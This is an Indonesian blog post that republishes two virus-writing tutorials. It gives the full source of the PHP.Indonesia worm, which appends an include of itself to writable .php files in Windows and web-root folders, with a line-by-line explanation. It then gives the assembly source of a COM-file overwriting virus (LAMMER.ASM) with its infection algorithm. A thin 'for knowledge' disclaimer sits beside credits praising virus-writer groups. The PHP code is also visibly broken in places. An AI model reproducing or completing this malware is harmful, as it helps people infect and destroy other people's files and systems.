Home / Unlabelled / Cara Sederhana membuat virus PHP

Cara Sederhana membuat virus PHP

بِسْــــــــــــــــمِ اﷲِالرَّحْمَنِ اارَّحِيم

Posted by Unknown Selasa, 22 November 2011 0 komentar

dari pemilik blog : bahasan virus ini dari sumber :

http://hardskill.wordpress.com/2011/02/10/cara-sederhana-membuat-virus-php/

Membuat virus bisa dengan bahasa apa saja dan salah

satunya adalah dengan bahasa PHP. Pada artikel ini akan kita

lihat bagaimana virus PHP.Indonesia yang juga dikenal dengan

nama I-Worm.PHP.Indonesia dibuat.

OK,Sebelum saya di BOM…saya mau ngasih tau beberapa hal sbb :

Artikel ini ditujukan buat menambah pengetahuan IT kita saja.
Saya dan penulis asli artikel ini tidak bertanggungjawab Jika ada lamer yang bertindak bodoh dengan menyebarkan skrip ini.
Judul asli artikel ini adalah “Simple technique how towrite PHP virus”.
Artikel ini sebenar hanya iseng (http://berfikirdengan.wordpress.com).dan saya hanya menterjemahkannya kedalam bahasa indonesia,saya nanti akan mencantumkan kredit kepada sobat saya redIT,karna saya udah buat artikel ini memakai versi indonesia.
Skrip yang saya pake disini juga merupakan skrip virus”PHP.Indonesia” udah terdeteksi Kaspersky nama”I-Worm.PHP.Indonesia”Ok…Kita mulai aja..!!

-Pertama2 gw kasih mentahan skrip PHP.Indonesia,nanti gw akan

coba ngejelasin

baris demi baris arti codenya.

——————————-Code——————————-

// #################################################

// # PHP.Indonesia made for all Chicken looser ground the

world #

// # By sevenC / N0:7

// # http://sevenc.vze.com

// # sevenC_zone@yahoo.com

// ##################################################

$jawa = “indonesia.php\n”;

$sumatra = “Wellcome to Indonesian PHPlovers.\n”;

$kalimantan = $jawa . $sumatra;

echo $kalimantan;

$all = opendir(‘C:\Windows\’);

$all1 = opendir(‘C:\My Documents\’);

$all2 = opendir(‘C:\InetPub\wwwRoot\’);

$all3 = $all && $all1 && $all2

while ($file = readdir($all3))

{

$inf = true;

$exe = false;

if ( ($exe = strstr ($file, ‘.php’)) || ($exe = strstr

($file, ‘.php2′)) || ($exe = strstr ($file, ‘.php3′)) )

if ( is_file($file) && is_writeable($file) )

{

$new = fopen($file, “r”);

$look = fread($new, filesize($file));

$yes = strstr ($look, ‘indonesia.php’);

if (!$yes) $inf = false;

}

if ( ($inf=false) )

{

$new = fopen($file, “a”);

$fputs($new, “<!– “);

$fputs($new, “PHP.indonesia – “);

$fputs($new, “By sevenC / N0:7, “);

$fputs($new, “http://trax.to/sevenC, “);

$fputs($new, “sevenC_Zone@yahoo.com, “);

$fputs($new, “SECTORS UNDERGROUND TEAM (Indonesia)”);

$fputs($new, “—>”);

$fputs($new, “<?php “);

$fputs($new, “include(\””);

$fputs($new, __FILE__);

$fputs($new, “\”); “);

$fputs($new, “?>”);

return;

}

closedir($all3);

// PHP.Indonesia made for all Chicken looser ground the world

// By sevenC / N0:7

————————————–eoc———————–

Udah.. liat..? Mau belajar ? yeah… Gw akan coba jelasin

baris per baris

code virus PHP.Indonesia,tapi kalu gw salah mohon dikoreksi

yah…!!

maklum

gw belum setaraf sama sevenC,hehehe…

————————————-begin———————-

* Loe pasti tau kalo PHP musti dimulai make tanda ini –> <?

buat ngunjukin

browser kalo entu skrip PHP.

// ###############################################

// # PHP.Indonesia made for all Chicken looser ground the

world #

// # By sevenC / N0:7

// # http://sevenc.vze.com

// # sevenC_zone@yahoo.com

// ###############################################

* Pertama loe musti tau kalo komentar dalam PHP harus dimulai

dengan karakter –>> //

Jadi baris2 di atas engga akan di eksekusi karna cuman

komentar.

$jawa = “indonesia.php\n”;

* Pemberian nama variabel harus dimulai dengan karakter $

* Menset variabel jawa sama dengan string “indonesia.php” dan

\n ntu ganti baris

* Setiap satu baris kalimat musti diakhiri dengan karakter

titik koma à ;

$sumatra = “Wellcome to Indonesian PHPlovers.\n”;

* Menset variabel sumatra sama dengan string “Wellcome to

Indonesian PHPlovers”

$kalimantan = $jawa . $sumatra;

* var kalimantan = var gabungan jawa dan var sumatra

echo $kalimantan;

* Menulis variabel kalimantan kedalam texttream

$all = opendir(‘C:\Windows\’);

* var $all = membuka direktory windows

$all1 = opendir(‘C:\My Documents\’);

* var $all1 = membuka direktory My Documents

$all2 = opendir(‘C:\InetPub\wwwRoot\’);

* var $all2 = membuka directori wwwRoot

* karna saya rasa maksud sevenC membuka folder ini adalah

karna di PWS file-file PHP

* biasanya diletakan di direktori ini

$all3 = $all && $all1 && $all2

* $all3 = gabungan dari $all , $all1 dan $all3

while ($file = readdir($all3))

* Perulangan kita mulai ketika kita membaca isi direktori

{

* Inget dengan tanda ini..!!

$inf = true;

* menSet var $inf sebagai variabel boolean = true

$exe = false;

* menSet var $exe sebagai variabel boolean = false

if ( ($exe = strstr ($file, ‘.php’)) || ($exe = strstr

($file, ‘.phtml’)) || ($exe = strstr ($file, ‘.php3′)) )

* Lihatlah extensi2 file yang akan kita serang

(php,phtml,php3)

if ( is_file($file) && is_writeable($file) )

* Mencek atribut2 file,jika kita diijinkan menulis lalu

{

* Skali lagi jangan lupa tanda ini

$new = fopen($file, “r”);

* menSet $new = membuka file baru dengan atribut read only

yang hanya bisa dibaca saja

$look = fread($new, filesize($file));

* menSet $look = membaca var $new dan ukuran dari file

$yes = strstr ($look, ‘indonesia.php’);

* menSet $yes = $look , indonesia.php

if (!$yes) $inf = false;

* Jika bukan var $yes maka var $inf bernilai salah

}

if ( ($inf=false) )

* jika var $inf = salah kemudian

{

$new = fopen($file, “a”);

* menSet $new = membuka file ( variabel $file ) / file yang

diinfeksi

$fputs($new, “<!– “);

* tulis string “<!–” kedalam file tsb ($new)

$fputs($new, “PHP.indonesia – “);

* tulis string “PHP.indonesia – ” kedalam file tsb ($new)

$fputs($new, “By sevenC / N0:7, “);

* tulis string “By sevenC / N0:7, ” kedalam file tsb ($new)

$fputs($new, “http://trax.to/sevenC, “);

* tulis string “http://trax.to/sevenC, ” kedalam file tsb

($new)

$fputs($new, “sevenC_Zone@yahoo.com, “);

* tulis string “sevenC_Zone@yahoo.com, ” kedalam file tsb

($new)

$fputs($new, “SECTORS UNDERGROUND TEAM (Indonesia)”);

* tulis string tsb ($new) “SECTORS UNDERGROUND TEAM

(Indonesia)” kedalam file tsb ($new)

$fputs($new, “—>”);

* tulis string “—>” kedalam file tsb ($new)

$fputs($new, “<?php “);

* Tulis seluruh kode virus ini kedalam file tsb

$fputs($new, “include(\””);

* tulis string “include(\” kedalam file tsb ($new)

$fputs($new, __FILE__);

* Tulis juga seluruh kode / skrip asli dari file tsb

$fputs($new, “\”); “);

* Tulis “\” kedalam file tsb

$fputs($new, “?>”);

* Tulis “?>” kedalam file tsb

return;

* Ulangi langkah-langkah diatas

}

closedir($all3);

* menutup semua direktori yang aktif tadi ($all3)

// PHP.Indonesia made for all Chicken looser ground the world

// By sevenC / N0:7

* komentar om sevenC

* Nutup skrip virus PHP ini

——————————–Selesai—————————

Ok… mudah-mudahan loe semua ngerti apa yang gw tulis

diatas,kalo kagak ? bodo amat

Kredit buat :

1. sevenC (http://trax.to/sevenC)

Biarpun umurnya masih belasan tapi gw salut banget sama

otaknya karna

Gw udah banyak belajar dari artikelnya.greatz & Thankz

man..!!

kapan neh bisa ktemuan ??

2. SECTORS (http://sectors.vze.com)

Makasih buat semua anak2 sectors baik yang masih aktif

maupun tidak di forum

teruskan perjuangan kalian, jangan mau bangsa kita ditindas

kebodohan.

Bantai semua lamer yang ada di Forum.

3. IVWA / Indonesian Virus Writer Association

(http://www.geocities.com/ivwa_staff)

Kapan neh peluncuran zine pertama ? gw udah gak sabar

neh…!!

4. semua anak2 yang pernah gw temuin di #sectors (woi channel

jangan ditinggal molo..!!)

saran dan kritik kirim ke stupy_man@yahoo.com

stupy (ex member of sectors)

stupy_man @ yahoo.com

Pemrograman Virus Komputer II

Thursday, February 13, 2003- Jumlah Klik [3091] , Penulis :

Dr`Ponidi

Jasakom – Bila dibandingkan dengan virus bacthfile, yang

pernah kita bicarakan maka virus yang kita bahas sekarang ini

telah memiliki kelima kemampuan seperti apa yang telah saya

sampaikan terdahulu.

1. Pendahuluan

Virus komputer yang akan dibicarakan dibawah ini ditulis dalam

bahasa assembley.Bila dibandingkan dengan virus bacthfile,

yang pernah kita bicarakan maka virus yang kita bahas sekarang

ini telah memiliki kelima kemampuan seperti apa yang telah

saya sampaikan terdahulu.

Virus ini mampu mencari semua file COM yang ada pada disket,

serta memeriksanya apakah telah tertular atau belum.Bila

belum, maka virus akan menularinya.Routine manipulasi yang

dimiliki virus ini hanyalah berupa tampilan pesan :”File ini

telah tertular Virus komputer!” atau “Semua file COM pada

disket ini telah tertular virus komputer!!!”.

Berbeda dengan virus batchfile yang menghasilkan file baru dan

membutuhkan beberapa file untuk menjalankannya, maka virus

yang akan kita bahas ini nantinya dapat bekerja sendiri dan

tidak menghasilkan file baru, sehingga kemampuan

menyembunyikan diri dari virus ini lebih baik.

Seperti halnya virus batchfile, virus dibawah ini adalah

termasuk jenis virus yang menumpangi program yang

ditularinya.Dengan demikian virus ini bersifat merusak.

2. Algoritma

Algoritma yang digunakan adalah sbb:

1.cari file COM yang pertama

2.buka dan baca file tersebut, letakkan pada buffer (di RAM)

3.Dengan membandingkan tanda pengenal virus dan rangkaian byte

bagian awal dari program, periksa apakah file tersebut telah

tertular virus atau belum.

4.a) Bila belum, maka tulari file tersebut dengan jalan

menyalin seluruh program virus ke file tersebut

(menumpangi).Kemudian tampilkan pesan :”File ini telah

tertular Virus Komputer !”

b) Bila sudah, maka carilah file COM berikutnya.Ulangi langkah

5.Jika semua file COM telah tertular, maka tampilkan pesan :

“semua file Com pada disket ini telah tertular virus

komputer!!!”

3. Program dan Mekanisme Penularan

Program dibawah ini merupakan implementasi dari bagian diatas.

Catatan : Program virus ini menggunakan instruksi

macro.Definisi macro yang digunakan terdapat pada file

LAMMER.MAC.(klo pengen liat file macronya kirim email ke

Dr`Ponidi@crackdealer.com)

;——————————————————————————

; LAMMER.ASM

;

;CODE BY : #DEFACE-TEAM@IRC.DAL.NET

; #DHEGLENG@IRC.DAL.NET

;

;RETRIEVAL SYSTEM BY: DR`PONIDI@CRACKDEALER.COM

;

;VIRUS INI MENYERANG DAN MERUSAK SEMUA FILE COM.

;BERHATI-HATILAH!

;——————————————————————————

IF1

INCLUDE LAMMER.MAC

ENDIF

Code_segSEGMENT

ASSUME CS:Code_seg

ORG 100h

Mulai :jmp kerjakan

IdentitasDB `File ini telah tertular virus komputer !$`

PeringatanDB `semua file COM dalam disket ini telah

tertular virus`

DB `Komputer !!!$`

File_COMDB`*.com`,0h

Nama_fileDB 13 DUP(?)

Panjang_idequ 45

Panjang_virequ 445

Atributequ 20h

Open_codeequ 2

Jumlahequ 0ffffh

DTADB43 DUP(20h)

Kerjakan :Set_DTA DTA

Mov ax,0

Find_first file_COM,Atribut

Masih_adakah:cmp ax,0

Je Laksanakan

Cmp ax,2

Je Keluar

Tulis_string peringatan

Jmp Keluar

Keluar :Ke_dos

Laksanakan :mov si,offset DTA + 30

Pindahkan_string 13,nama_file

Buka_file_DTA DTA,Open_code

Push bx

Baca_file bx,Buffer,jumlah

Push ax

Mov di,offset Buffer + 3

Bandingkan-string Identitas,panjang_id

Cmp bx,0

Je Cari_lainnya

Mov si,100h

Pindahkan_string panjang_vir,Buffer

Pop ax

Pop bx

Push ax

Tutup_file bx

Hapus_file Nama_file

Buat_file Nama_file,Atribut

Buka_file Nama_file,Open_code

Pop ax

Tulis_file bx,buffer,ax

Tutup_file bx

Tulis_string identitas

Ke_dos

Cari_lainnya :pop ax

pop bx

Tutup_file bx

Find_next

Jmp masih_adakah

BufferLabel byte

Code_segENDS

END mulai

4. Penjelasan

Awal dari penularan dimulai ketika program virus ini

dijalankan pada disket yang berisi file-file COM.Virus

mula-mula akan menulari file COM yang pertama (berdasarkan

urutan file-file pada disket).Dengan penularan ini, maka file

tersebut menjadi sumber penularan baru, dan virus yang asli

dapat dihapus.File-file yang telah tertular ukurannya tidak

berubah.

Bila file yang telah tertular itu dijalankan, maka file itu

tidak dapat menjalankan fungsinya dan hanya akan menampilkan

pesan :”File ini telah tertular Virus komputer!”.Sebelumnya,

file tersebut akan menulari file COM lainnya.

Bila kebetulan file .COM pertama yang diserang didalam

directory utama adalah COMMAND.COM, maka setiap kali melakukan

boot dengan disket itu, tak akan pernah berhasil dan

sebelumnya virus akan menulari sebuah program COM lain yang

belum tertular.

Harap diperhatikan bahwa virus ini tidak dapat bekerja dengan

baik bila berada pada file COM yang ukurannya lebih kecil

daripada ukuran program virus yang asli, atau terlalu besar

(mendekati atau lebih dari FFFF heksadesimal = 64KB)

Ini disebabkan karena program virus tidak dapat disalin secara

lengkap atau buffer telah melampaui batas daerah CS (Code

Segment)

Demikianlah Artikel yang dapat saya sampaikan pada kesempatan

ini, Semoga informasi yang saya sampaikan dapat bermanfaat

bagi pengetahuan bagi kita semua ,khususnya bagi yang concern

terhadap virus.Sekian terima kasih cao……:)

TERIMA KASIH ATAS KUNJUNGAN SAUDARA

Judul: Cara Sederhana membuat virus PHP
Ditulis oleh Unknown
Rating Blog 5 dari 5

Semoga artikel ini bermanfaat bagi saudara. Jika ingin mengutip, baik itu sebagian atau keseluruhan dari isi artikel ini harap menyertakan link dofollow ke http://cintafido.blogspot.com/2011/11/cara-sederhana-membuat-virus-php.html. Terima kasih sudah singgah membaca artikel ini.